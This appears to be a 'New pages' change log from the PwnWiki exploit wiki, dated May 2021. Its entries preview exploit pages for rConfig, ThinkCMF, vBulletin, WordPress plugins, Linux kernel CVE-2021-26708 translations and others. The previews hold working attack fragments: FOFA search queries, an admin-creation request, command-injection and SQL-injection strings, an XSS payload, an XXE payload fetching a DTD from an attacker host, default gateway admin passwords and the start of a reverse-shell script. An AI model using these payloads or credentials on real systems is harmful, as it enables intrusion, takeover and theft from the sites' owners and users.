New pages

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

16:21, 7 May 2021 ‎RConfig useradmin.inc.php 信息洩露漏洞 (hist | edit) ‎[81 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="rConfig" </pre> ==Payload== <pre> /useradmin.inc.php </pre>")
16:20, 7 May 2021 ‎RConfig userprocess.php 任意用戶創建漏洞 (hist | edit) ‎[4,039 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="rConfig" </pre> ==漏洞利用== 發送如下請求包創建管理員用戶 pqtest，密碼為 PQtest@123 <pre> POST /lib/crud/userprocess.php HTTP/1.1 H...")
16:17, 7 May 2021 ‎RConfig ajaxArchiveFiles.php 後台遠程命令執行漏洞 (hist | edit) ‎[5,263 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="rConfig" </pre> ==Request== <pre> GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=1&ext=;ls%3E../../pq.txt HTTP/1.1 Host: Cookie: cookname=pqtest; cooki...")
16:14, 7 May 2021 ‎電信中興ZXHN F450A網關默認管理員賬號密碼漏洞 (hist | edit) ‎[154 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> ZXHN F450A </pre> ==默認帳號密碼== <pre> user/pass useradmin/nE7jA%5m 普通管理員 telecomadmin/nE7jA%5m 超級管理員 </pre>")
12:26, 7 May 2021 ‎WordPress RSS for Yandex Turbo plugin version 1.29 XSS漏洞 (hist | edit) ‎[1,019 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==INFO== <pre> # Exploit Title: WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS) # Date: 17/04/2021 # Exploit Author: Himamshu Dilip Kulkarni # S...")
12:21, 7 May 2021 ‎ThinkCMF框架任意文件包含漏洞 (hist | edit) ‎[713 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== <pre> ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 </pre> ==Payload== <pre> ?a=display&templateFile=README.md </pre> ==P...")
19:55, 6 May 2021 ‎Wordpress Plugin WP Super Edit 2.5.4 遠程文件上傳漏洞 (hist | edit) ‎[2,721 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload # Author: h4shur # date: 2021-05-06 # Vendor Homepage: https://wordpress.org # Software Link:...")
19:55, 6 May 2021 ‎CVE-2021-28242 b2evolution 7-2-2 - 'cf name' SQL注入漏洞 (hist | edit) ‎[2,747 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty # Date: 05.06.2021 # Vendor: https:/...")
19:54, 6 May 2021 ‎Schlix CMS 2.2.6-6 遠程代碼執行漏洞 (hist | edit) ‎[15,088 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) # Date: 2021-05-06 # Exploit Author: Eren Saraç # Vendor Homepage: https://www.schli...")
19:53, 6 May 2021 ‎Schlix CMS 2.2.6-6 - 'title' XSS漏洞 (hist | edit) ‎[6,594 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş # Vendor Homepag...")
19:48, 6 May 2021 ‎CVE-2021-30461 VoIPmonitor 遠程PHP代碼執行漏洞 (hist | edit) ‎[2,812 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== VoIPmonitor 24.60及更低版本 ==EXP== <pre> import argparse from sys import argv,exit import time import random import string try: import requests e...")
16:59, 6 May 2021 ‎AVTECH 未授權信息洩露漏洞 (hist | edit) ‎[407 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,appl...")
16:54, 6 May 2021 ‎CVE-2021-29447 Wordpress XXE漏洞 (hist | edit) ‎[216 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;...")
12:58, 6 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/ar (hist | edit) ‎[27,242 bytes] ‎Pwnwiki (talk | contribs) (Created page with "CVE-2021-26708 Linux kernel قبل 5.10.13 ارتفاع ثغرة الامتياز")
12:07, 6 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/he (hist | edit) ‎[27,244 bytes] ‎Pwnwiki (talk | contribs) (Created page with "ליבת לינוקס CVE-2021-26708 לפני 5.10.13 העלאת פגיעות הרשאות")
10:20, 6 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/sv (hist | edit) ‎[26,014 bytes] ‎Pwnwiki (talk | contribs) (Created page with "== Implementera Use-after-free på sk_buff ==")
10:08, 6 May 2021 ‎Concrete5 CMS XSS漏洞 (hist | edit) ‎[302 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==簡介== Concrete5是一個免費的CMS系統，可以創建網站，並以其易用性而聞名。使用Concrete5的主要組織包括GlobalSign、美國陸軍、REC和BASF...")
09:52, 6 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/uk (hist | edit) ‎[32,920 bytes] ‎Pwnwiki (talk | contribs) (Created page with "Для того, щоб обробити <code> connect () </code> віртуального сокета, ядро виконує <code> vsock_stream_connect () </code>,...")
09:36, 6 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/pt (hist | edit) ‎[26,431 bytes] ‎Pwnwiki (talk | contribs) (Created page with "A criação de sockets <code> AF_VSOCK </code> está disponível para usuários não privilegiados e não requer espaço de nome de usuário.")
09:31, 6 May 2021 ‎JSQL 0.85注入漏洞 (hist | edit) ‎[84 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==File== https://github.com/JustYoomoon/Exploit/blob/main/jsql-injection-0.85.tar.gz")
20:24, 5 May 2021 ‎Anote 1.0 XSS&RCE漏洞 (hist | edit) ‎[3,928 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Anote 1.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendo...")
20:23, 5 May 2021 ‎Markdownify 1.2.0 XSS&RCE漏洞 (hist | edit) ‎[3,531 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Markdownify 1.2.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8)...")
20:22, 5 May 2021 ‎Markright 1.0 XSS&RCE漏洞 (hist | edit) ‎[3,454 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Markright 1.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # V...")
20:21, 5 May 2021 ‎Freeter 1.2.1 XSS&RCE漏洞 (hist | edit) ‎[3,573 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Freeter 1.2.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # V...")
20:20, 5 May 2021 ‎StudyMD 0.3.2 XSS&RCE漏洞 (hist | edit) ‎[3,496 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: StudyMD 0.3.2 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # V...")
20:20, 5 May 2021 ‎Marky 0.0.1 XSS&RCE漏洞 (hist | edit) ‎[3,504 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Marky 0.0.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Ven...")
20:19, 5 May 2021 ‎Moeditor 0.2.0 XSS&RCE漏洞 (hist | edit) ‎[3,472 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Moeditor 0.2.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) #...")
20:17, 5 May 2021 ‎SnipCommand 0.1.0 XSS&RCE漏洞 (hist | edit) ‎[3,766 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: SnipCommand 0.1.0 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8)...")
20:16, 5 May 2021 ‎Tagstoo 2.0.1 XSS&RCE漏洞 (hist | edit) ‎[4,298 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Tagstoo 2.0.1 - Stored XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8...")
20:15, 5 May 2021 ‎Xmind 2020 XSS&RCE漏洞 (hist | edit) ‎[8,016 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Xmind 2020 - XSS to RCE # Exploit Author: TaurusOmar # Date: May 4th, 2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # V...")
20:14, 5 May 2021 ‎Markdown Explorer 0.1.1 XSS&RCE漏洞 (hist | edit) ‎[3,841 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==INFO== <pre> # Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: Hig...")
20:13, 5 May 2021 ‎Savsoft Quiz 5 - 'User Account Settings' XSS漏洞 (hist | edit) ‎[1,098 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting # Date: 2021-05-04 # Exploit Author: strider # Software Link: https://g...")
15:01, 5 May 2021 ‎CVE-2019-10852 Computrols CBAS Web SQL注入漏洞 (hist | edit) ‎[142 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響版本== 19.0.0及以下 ==Payload== <pre> http://www.0-sec.org/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510 = 2510 </pre>")
15:00, 5 May 2021 ‎CVE-2019-10848 Computrols CBAS Web 用戶名枚舉漏洞 (hist | edit) ‎[680 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== 19.0.0及以下 ==測試無效賬戶== <pre> POST /cbas/index.php?m=auth&a=login HTTP/1.1 username=randomuser&password=&challenge=60753c1b5e449de80e21472b5...")
14:58, 5 May 2021 ‎CVE-2019-10846 Computrols CBAS Web XSS漏洞 (hist | edit) ‎[572 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== Computrols CBAS Web<=19.0.0 ==XSS== <pre> POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1 username="><script>confirm(document.cookie)</script>&submit_butto...")
14:56, 5 May 2021 ‎CVE-2019-3396 Atlassian Confluence 路徑穿越&命令執行漏洞 (hist | edit) ‎[1,220 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== <pre> 所有1.xx，2.xx，3.xx，4.xx和5.xx版本所有6.0.x，6.1.x，6.2.x，6.3.x，6.4.x和6.5.x版本 6.6.12之前的所有6.6.x版本所有6.7.x...")
14:52, 5 May 2021 ‎CVE-2015-7808 VBulletin VBulletin 5.1.4 - 5.1.9 遠程命令執行漏洞 (hist | edit) ‎[353 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> http://0-sec.org/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A...")
14:51, 5 May 2021 ‎OpenSNS v6.1.0 前台sql注入漏洞 (hist | edit) ‎[747 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> POST /index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetcity.html HTTP/1.1 Host: 0-sec.org User-Agent: Mozilla/5.0 (W...")
14:49, 5 May 2021 ‎Pyspider未授權訪問漏洞 (hist | edit) ‎[4,171 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==exp.py== <pre> import requests print("这是pyspider未授权访问的EXP，它能反弹shell,但由于本人VPS过期未能测试") data=''' webdav_mode=false&script=from+p...")
14:46, 5 May 2021 ‎R&D Visions CMS SQL注入漏洞 (hist | edit) ‎[268 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Google Dork== <pre> intext:"Website by R&D Visions" inurl:.php?id= intext:"CMS System by R&D Visions" </pre> ==Payload== <pre> https://www.0-sec.org/home.php?newid=-53+Uni...")
14:45, 5 May 2021 ‎PHPOK 5.3 前台無限制注入漏洞 (hist | edit) ‎[708 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> http://0-sec.org/api.php?c=project&f=index&token=1234&id=news&sort=(sleep(5)) </pre> ==Request== <pre> GET /api.php?c=project&f=index&token=1234&id=news&sor...")
14:44, 5 May 2021 ‎PHPOK 5.3 前台注入漏洞 (hist | edit) ‎[776 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> http://0-sec.org/api.php?c=index&f=token&id=m_picplayer </pre> ==Request== <pre> GET /api.php?c=index&f=phpok&token=6318fdtC3WRpOzYNzKVNw78PFa9OhFea5pp3/uZ4...")
14:43, 5 May 2021 ‎CVE-2019-16662 rConfig 遠程命令執行漏洞 (hist | edit) ‎[2,927 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC1== <pre> #!/usr/bin/python # Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution # Date: 18/09/2019 # Exploit Author: Askar (@mohammadaskar2) # CVE : CV...")
14:40, 5 May 2021 ‎74cms v4.2.1-v4.2.129 後台getshell漏洞 (hist | edit) ‎[279 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 管理面板-風格模板-工具-點擊可用模板抓包 <pre> url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),' webshell:ht...")
14:22, 5 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/zh-hant (hist | edit) ‎[23,945 bytes] ‎Pwnwiki (talk | contribs) (Created page with "2.在用戶空間中準備一個2800字節的緩衝區，並用0x42對其memset()")
14:05, 5 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/ru (hist | edit) ‎[33,411 bytes] ‎Pwnwiki (talk | contribs) (Created page with "7. Если вы найдете 0x42424242424242lu в расположении сетевых данных, найдите настоящий sk_buff и переходите...")
13:44, 5 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/es (hist | edit) ‎[26,772 bytes] ‎Pwnwiki (talk | contribs) (Created page with "Estas vulnerabilidades son causadas por la contención condicional provocada por un falso bloqueo en <code>net/vmw_vsock/af_vsock.c</code>. Estas contenciones de condiciones s...")
13:28, 5 May 2021 ‎CVE-2021-26708 Linux kernel before 5.10.13 特權提升漏洞/ja (hist | edit) ‎[29,104 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==脆弱性==")
13:16, 5 May 2021 ‎CVE-2021-22502 Micro Focus Operations Bridge Reporter 未經驗證命令注入漏洞 (hist | edit) ‎[4,478 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule...")
13:12, 5 May 2021 ‎CVE-2021-31777 TYPO3 version 6.2.1 SQL注入漏洞 (hist | edit) ‎[1,767 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-31777 from selenium import webdriver import time import os, sys # Vendor: https://typo3.org/ website_lin...")

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

Anonymous

Search

New pages

Namespaces

More

Page actions

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

New pages

Navigation

Wiki tools

Page tools